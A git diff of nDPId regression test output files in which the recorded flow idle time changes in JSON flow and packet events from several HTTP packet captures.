-00827{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1593713340401,"flow_last_seen":1593713340404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1593713340404,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593713340401,"flow_last_seen":1593713340401,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1593713340401,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593713340401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0t6tAAHkGyLLAqAABwKgAFJlEemkrolmxAAAAAIAC+vBZugAAAgQFtAEBBAIBAwMG"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593713340401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"YDjgxTWgABjzZLGICABFAAA0AABAALIGR17AqAAUwKgAAXppmUT8ca\/AK6JZsoAS+vCBjAAAAgQFtAEBBAIBAwMH"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593713340401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAAot6xAAHkGyL3AqAABwKgAFJlEemkrolmy\/HGvwVAQA+zlTAAAAAAAAAAA"} +00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1593713340401,"flow_last_seen":1593713340402,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1593713340402,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"toni.lan","url":"toni.lan:31337\/","code":0,"content_type":"","user_agent":""}} +00827{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1593713340401,"flow_last_seen":1593713340404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1593713340404,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-data-len":1699,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1593713340404} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/14 diff --git a/test/results/http-manipulated.pcap.out b/test/results/http-manipulated.pcap.out index d2d1ede79..d5fe222c6 100644 --- a/test/results/http-manipulated.pcap.out +++ b/test/results/http-manipulated.pcap.out @@ -1,18 +1,18 @@ 00467{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http-manipulated.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946727901369} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946727901369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAA0umlAAI8Gr+7AqAAUwKgAB4NgH5BugXMeAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946727901369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg2CKV04jboFzH4AS+vCVmQAAAgQFtAEBBAIBAwMG"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946727901369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAAoumpAAI8Gr\/nAqAAUwKgAB4NgH5BugXMfildOJFAQAfaBhgAA"} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"wwww.lan","url":"wwww.lan:8080\/","code":0,"content_type":"","user_agent":"curl\/7.64.0"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946727901369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAA0umlAAI8Gr+7AqAAUwKgAB4NgH5BugXMeAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946727901369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg2CKV04jboFzH4AS+vCVmQAAAgQFtAEBBAIBAwMG"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946727901369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAAoumpAAI8Gr\/nAqAAUwKgAB4NgH5BugXMfildOJFAQAfaBhgAA"} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"wwww.lan","url":"wwww.lan:8080\/","code":0,"content_type":"","user_agent":"curl\/7.64.0"}} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":11,"packets-processed":10,"total-skipped-flows":0,"total-l4-data-len":653,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":946729142063} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946729142063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAA0svlAAL4GiF7AqAAUwKgAB4OUH5ARN20zAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946729142063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg5SNfRmbETdtNIAS+vAp\/QAAAgQFtAEBBAIBAwMG"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946729142063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAAosvpAAL4GiGnAqAAUwKgAB4OUH5ARN200jX0ZnFAQAfaBhgAA"} -00987{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.lan","url":"www.lan:8080\/aaaaaaaaaaaaaaaaaaaaaaaa_very_long_uri","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:81.0) Gecko\/20100101 Firefox\/81.0"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":946727901369,"flow_last_seen":946727901370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":577,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":318,"flow_first_seen":946729142063,"flow_last_seen":946729148160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29200,"flow_tot_l4_payload_len":940892,"flow_avg_l4_payload_len":2958,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946729142063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAA0svlAAL4GiF7AqAAUwKgAB4OUH5ARN20zAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946729142063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg5SNfRmbETdtNIAS+vAp\/QAAAgQFtAEBBAIBAwMG"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946729142063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAAosvpAAL4GiGnAqAAUwKgAB4OUH5ARN200jX0ZnFAQAfaBhgAA"} +00987{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.lan","url":"www.lan:8080\/aaaaaaaaaaaaaaaaaaaaaaaa_very_long_uri","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:81.0) Gecko\/20100101 Firefox\/81.0"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":946727901369,"flow_last_seen":946727901370,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":577,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":318,"flow_first_seen":946729142063,"flow_last_seen":946729148160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29200,"flow_tot_l4_payload_len":940892,"flow_avg_l4_payload_len":2958,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":328,"packets-processed":328,"total-skipped-flows":0,"total-l4-data-len":941545,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":946729148160} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 328/328 diff --git a/test/results/http_auth.pcap.out b/test/results/http_auth.pcap.out index 52daa0f5d..c4889538f 100644 --- a/test/results/http_auth.pcap.out +++ b/test/results/http_auth.pcap.out @@ -1,11 +1,11 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http_auth.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1381844050222} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1381844050222,"flow_last_seen":1381844050222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1381844050222,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1381844050222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1381844050222,"pkt":"TBfruiThKM\/pITwrCABFAABARSdAAEAGtjzAqAAEwP69qdRBAFCa4jGyAAAAALAC\/\/8jTAAAAgQFtAEDAwQBAQgKH38TuAAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1381844050402,"pkt":"KM\/pITwrTBfruiThCABFAAA8AABAADgGA2jA\/r2pwKgABABQ1EEDZtH9muIxs6ASOJA\/hAAAAgQFtAQCCAowzbX3H38TuAEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1381844050402,"pkt":"TBfruiThKM\/pITwrCABFAAA0XSJAAEAGnk3AqAAEwP69qdRBAFCa4jGzA2bR\/oAQICuGBAAAAQEICh9\/FGkwzbX3"} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1381844050222,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":739,"flow_tot_l4_payload_len":739,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1381844050402,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"browserspy.dk","url":"browserspy.dk\/password-ok.php","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/30.0.1599.69 Safari\/537.36"}} 